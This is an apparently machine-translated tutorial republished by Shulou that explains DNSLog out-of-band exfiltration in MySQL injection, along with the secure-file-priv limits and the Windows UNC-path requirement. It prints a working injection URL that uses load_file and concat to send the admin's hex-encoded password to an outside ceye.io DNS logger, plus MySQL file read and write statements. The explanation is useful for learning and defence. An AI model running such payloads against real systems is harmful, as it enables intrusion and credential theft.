Shulou(Shulou.com)06/01 Report--

This article mainly introduces "what is the method of DNSLog in MySQL injection". In daily operation, I believe many people have doubts about what is the method of DNSLog in MySQL injection. I have consulted all kinds of data and sorted out simple and easy operation methods. I hope to help you answer the question of "what is the method of DNSLog in MySQL injection"! Next, please follow the small series to learn together!

About DNSlog Exploitation in Web Attacks

Simple understanding is that in some cases where it is impossible to directly exploit the vulnerability to obtain echo, but the target can initiate DNS requests, at this time, the data you want to obtain can be taken out through DNSlog.

In what circumstances is it commonly used?

Blinding in SQL injection

command execution without echo

SSRF without echo

Fundamentals of DNSlog Attack

As an attacker, submit an injection statement that causes the database to concatenate the values and domain names that need to be queried, and then a DNS query occurs. As long as we can get the DNS log, we will get the desired value. So we need to have our own domain name, and then configure a NS record at the domain name provider, and then we can get DNS logs on the NS server.

DNSLOG SQL Injection in MySQL Database

One of the most common injection scenarios demonstrated in this demonstration is injection at the condition after WHERE. The experimental environment has a test_user table with three fields id, user, and pass. as follows

iduserpass1adminadmin123

Finally, instead of building a DNS server by yourself, you can directly use ceye.io, which integrates the functions of Dnslog.

requiring conditional

MySQL Open load_file()

DNSLog platform (hyuga, CEYE)

Windows platform

Mysql server-side file reading and writing

Condition: The server is configured with read-write directories and correct user permissions.

safety protection

There are many restrictions on reading files on the mysql server, mainly the configuration of the mysql database. For security reasons, when reading text files located on the server, the files must be in the database directory and can be read by everyone. You can see this by executing show variables like '%secure %'.

The secure-file-priv parameter is used to limit LOAD DATA,SELECT... OUTFILE,DUMPFILE and LOAD_FILE() can operate on folders.

The value of secure-file-priv can be divided into three cases:

The value of secure-file-priv is null, indicating that mysqld is not allowed to be imported.| derived

The value of secure-file-priv is/tmp/, which means to restrict the import of mysqld| Export can only occur in/tmp/directory, in which case an error will be reported if reading or writing occurs in another folder

When the value of secure-file-priv has no specific value, it means that mysqld will not be imported.| Export is restricted.

In addition, read or write files must have user privileges to operate otherwise an error will be reported.

ERROR 1045 (28000): Access denied for user

read the file

SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;create database test;create table test (id TEXT, content TEXT);load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';

written to the file

select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaaa";load_file

MySQL should be the most used DNSLOG in actual combat.

In MySQL, there is a load_file function that can be used to read local files.

http://127.0.0.1/mysql.php? id=1 union select 1,2,load_file(concat('\\\\',(SELECT hex(pass) FROM test.test_user WHERE user='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\\abc'))

You can see that the Hex code of the value of the pass field in test_user is queried. Why is the purpose of Hex coding in this place to reduce interference? Because many times the value of the database field may have special symbols. These special symbols cannot be spliced in the domain name. DNS queries cannot be made because the domain name has certain specifications. Some special symbols cannot be brought in.

Note: The load_file function cannot be used to do DNSLOG attacks under Linux because it involves UNC paths in Windows.

UNC path

Explanation of UNC path of Baidu

UNC is a naming convention primarily used to designate and map network drives on Microsoft Windows. UNC naming conventions are applied at most to accessing file servers or printers in a local area network. This is how we share files on the Internet.

In fact, we usually use this form of network address when sharing files in Windows

\\sss.xxx\test\

This also explains why CONCAT() concatenates 4\s, because of escape reasons, 4\s become 2\s, the purpose is to use UNC path.

Because Linux doesn't have UNC paths, MySQL can't take data out in this way when dealing with Linux systems.

At this point, the study of "what is the method of DNSLog in MySQL injection" is over, hoping to solve everyone's doubts. Theory and practice can better match to help everyone learn, go and try it! If you want to continue learning more relevant knowledge, please continue to pay attention to the website, Xiaobian will continue to strive to bring more practical articles for everyone!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.